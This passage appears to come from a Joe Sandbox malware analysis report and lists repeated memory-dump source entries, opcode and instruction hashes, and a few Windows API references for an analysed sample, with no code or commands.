                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1744da18f64dc79e14d8e36bbbf4bd972e73dc4913910eff474068959f5e674d
                                                                                                                      • Instruction ID: a98e3624e8f37947a0e061a1b29db1c6832a847683ab84d230887380155f7f9b
                                                                                                                      • Opcode Fuzzy Hash: 1744da18f64dc79e14d8e36bbbf4bd972e73dc4913910eff474068959f5e674d
                                                                                                                      • Instruction Fuzzy Hash: 89412A3565C7824BC336CE7994903BABBD2ABC6310F0C8A7D98D097785DE7CC80A8791
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 549b4f452cc201c5641bd5c19871334d83eb667d6dce25a4303c69a392540114
                                                                                                                      • Instruction ID: c3920a5bad82b2fb401ade05b8b046531eba3c7278ff448df95a5ff0d3cd9722
                                                                                                                      • Opcode Fuzzy Hash: 549b4f452cc201c5641bd5c19871334d83eb667d6dce25a4303c69a392540114
                                                                                                                      • Instruction Fuzzy Hash: C6310732B856104BD318CA29CC423AABBD6A7C9324F0ED779E898D73D4E63DCC418791
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bcaeed6e48b24ae2a8cd28d1105d407858c563e08032dd46f6af0fe4f131f9e0
                                                                                                                      • Instruction ID: 7557f0fa19789e1914fe84686dbcab111e535b14adbe6f97c39b8fcfae748025
                                                                                                                      • Opcode Fuzzy Hash: bcaeed6e48b24ae2a8cd28d1105d407858c563e08032dd46f6af0fe4f131f9e0
                                                                                                                      • Instruction Fuzzy Hash: EC31B833A1151147E714CA2ACC4479632D2ABD8328F3E86B99429DF7D2CD3B9D0386C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a2a4d5fd578bd396aa0af15cb6ab0e54a13c3b7b2a9c76c21a4d61f111652cf1
                                                                                                                      • Instruction ID: 6c8e4c9673cc15bbc702bed167dcbbb82e3021f105494757b680a4185f8f824a
                                                                                                                      • Opcode Fuzzy Hash: a2a4d5fd578bd396aa0af15cb6ab0e54a13c3b7b2a9c76c21a4d61f111652cf1
                                                                                                                      • Instruction Fuzzy Hash: 5F310A73A197144FD3189D7D988015E7B92ABD5734F2A4B2EDEB54B3C1DE708C409781
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cf2d6c8d8e0ce4be24285d9e3cc8b2a5da0c11118c90d4a1c167c7b400d72d4b
                                                                                                                      • Instruction ID: 739af0e99a692309eadeb8d74cc8cedc692a506e124fa41e213c6122d8cb0829
                                                                                                                      • Opcode Fuzzy Hash: cf2d6c8d8e0ce4be24285d9e3cc8b2a5da0c11118c90d4a1c167c7b400d72d4b
                                                                                                                      • Instruction Fuzzy Hash: 1E3126719483918FD718CA34D8A13BBBBD29FA7258F089A2DE0E593391D338C5468B57
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: aec1cfbcc0f08cee27abf22853a84cb241b0a967adefa26a82fd7ec6fe8abb82
                                                                                                                      • Instruction ID: e730129563667edf1bc61be6b1e3d5319ea018059aaaabacd30aa0c87266efef
                                                                                                                      • Opcode Fuzzy Hash: aec1cfbcc0f08cee27abf22853a84cb241b0a967adefa26a82fd7ec6fe8abb82
                                                                                                                      • Instruction Fuzzy Hash: 5A315C73E2593807C7088D3D5C1526975C29BC5255F5EC77CEDAA9F3C2DA319C0582D0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 41305cf3b9d177b5ddb8f36fbe4dc537e4b4ae08f3accfdb3d01e3decd18bcb9
                                                                                                                      • Instruction ID: dd3d422b9820cde0565d28f8a2907a4fa0ec3ed37d28419dcf6a9eed71f6a1b6
                                                                                                                      • Opcode Fuzzy Hash: 41305cf3b9d177b5ddb8f36fbe4dc537e4b4ae08f3accfdb3d01e3decd18bcb9
                                                                                                                      • Instruction Fuzzy Hash: 2C214D6650D7C146EB394B3A84243F6BFE26FE3345F2C48EDD0C8C7282DA7984458716
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
                                                                                                                      • Instruction ID: c42640394f6a365b54557dcc83b778698e5375f07056a7a0f2a9eb84f8cbb779
                                                                                                                      • Opcode Fuzzy Hash: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
                                                                                                                      • Instruction Fuzzy Hash: A3314B2250D6F34EC733892E449007E7AA09AA621572903FFDCF58B3C3C51AC94597E5
                                                                                                                      Memory Dump Source
Memory Dump Source
• Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
• Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0050561D
Strings
Memory Dump Source
• Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
• Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
Similarity
• API ID: EnvironmentExpandStrings
• String ID: $%$p:#$MO
• API String ID: 237503144-3521940197